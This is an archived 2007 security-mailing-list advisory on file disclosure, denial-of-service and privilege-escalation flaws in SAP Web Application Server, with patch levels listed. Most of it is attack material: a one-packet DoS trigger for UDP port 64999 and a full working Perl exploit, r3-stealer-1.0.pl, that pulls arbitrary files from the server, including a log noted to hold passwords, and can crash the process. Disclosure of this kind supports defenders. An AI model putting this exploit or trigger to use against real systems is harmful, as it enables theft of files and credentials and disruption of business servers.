[NEWS] Multiple Vulnerabilities in SAP Web Application Server (Technical Details)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Multiple Vulnerabilities in SAP Web Application Server (Technical Details)
------------------------------------------------------------------------


SUMMARY

Web Application Server (WAS or WEB AS) is "a component of the
<http://www.sap.com/solutions/netweaver/index.epx> NetWeaver solution
which works as a web application server to SAP solutions. From the SAP
point of view the (WAS or Web AS) is the foundation on which most of their
product range runs".

Remote file disclosure, remote DoS, local privilege escalation
vulnerabilities discovered in SAP Web application server.

DETAILS

Vulnerable Systems:
* SAP Web AS 6.40 before patch 136
* SAP Web AS 7.00 before patch 66
* (All platforms, except the third vulnerability)

1) A remote file disclosure vulnerability allows reading any file to which
the user that the SAP Web Application Server is running as had access.
Under Windows, the service runs by default under the SAPServiceJ2E
account. This account is member of the local administrator group.

Note : Absolute paths can be used, so "C:\boot.ini" and
"\\10.11.12.13\share\image.jpg" are both OK.

2) A remote denial of service allows crashing the enserver.exe process.

Exploit:
To trigger the vulnerability, send "\x72\xfe" on port UDP/64999.

3) A local privilege escalation vulnerability allows any local user to use
the file disclosure vulnerability to access an user-controlled process via
a named pipe and impersonate as user SAPServiceJ2E. The exploitation is
possible only on Windows 2000 pre-SP4, Windows XP pre-SP2 and Windows NT.
Exploit : use "r3-stealer-1.0.pl" (attached) and "
<http://security.nnov.ru/files/tac0tac0.c> tac0tac0.c"

Fix:
Apply patch 136 or newer for version 6.40
Apply patch 66 or newer for version 7.00

Note : the mentioned patch level refers to the enqueue server
More details can be found in SAP notes 948457 and 959877

Disclosure Timeline:
Release Date : 8 February 2007

Exploit (r3-stealer-1.0.pl):
#!/usr/bin/perl -w

##
## SAP 'enserver.exe' file downloader
## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
##
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
##
## File parameter :
## C:\boot.ini
## \\10.11.12.13\share\image.jpg
## ..\..\..\..\..\..\Documents and Settings\All Users\Application
Data\sapdb\wa\httpreq.log (contains passwords !)
##

# Init

use strict;
use IO::Socket;

my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = "";

my $socket;
my $reply;

$|=1;

# Get arguments

if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 <ip> <port> <remote
filename> (<local filename>)\n";}
my $host=$ARGV[0];
my $port=$ARGV[1];
my $filename=$ARGV[2];
my $output=$ARGV[3];

# Calculate variables

my $lg = length($filename);
my $tag1 = sprintf('%x', 0x4F + $lg);
my $tag2 = sprintf('%x', 0x20 + $lg);

# Show banner

print "###########################\n";
print "### SAP 'enserver.exe' file downloader\n";
print "### Downloading '$filename' from '$host'\n";
print "###########################\n\n";

# Define the packets

my $packet1 =
"0000005dabcde123000000000000005d0000005d06010000".
"000000060000000000040000000000010004000000000003". # Static
"5f6e69636f625f6e69636f625f6e69636f62315f". # ASCII string :
"_nicob_nicob_nicob1_"
"00000000020000003b000000050000000200000006000000".
"0400000001"; # Static

my $packet2 =
"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
"03000000454e430001010000234541410100000013030000".
"000000234541450001000000". $tag2 .
"0000000000007d00000000000000000000000000". unpack("H*",$filename) .
$crash ."000023454144"; # Crash if bad filename length

# Create the socket

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort =>
$port)
|| die "Connection refused at [$host:$port]";

# Send the two packet

print $socket pack("H*",$packet1);
print $socket pack("H*",$packet2);

sleep 2;

# Read and display response

recv($socket,$reply,150000,MSG_PEEK);
if ($reply =~ /^(.*)#EAD(.*)$/s) {
print "File received !\n";
if ((!defined($output)) or ($output eq "")) {
print "\n===========================================\n";
print $2;
print "\n===========================================\n";
} else {
open(OUT, "> $output") || die "Can't open $output ($0)";
print "File saved as '$output'\n";
print OUT $2;
close(OUT);
}
} else {
print "Problem interpreting reply :-(\n";
}

# Close the socket

print "\nThe end ...\n";
close $socket;


ADDITIONAL INFORMATION

The information has been provided by <mailto:nicob@xxxxxxxxx> Nicob.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages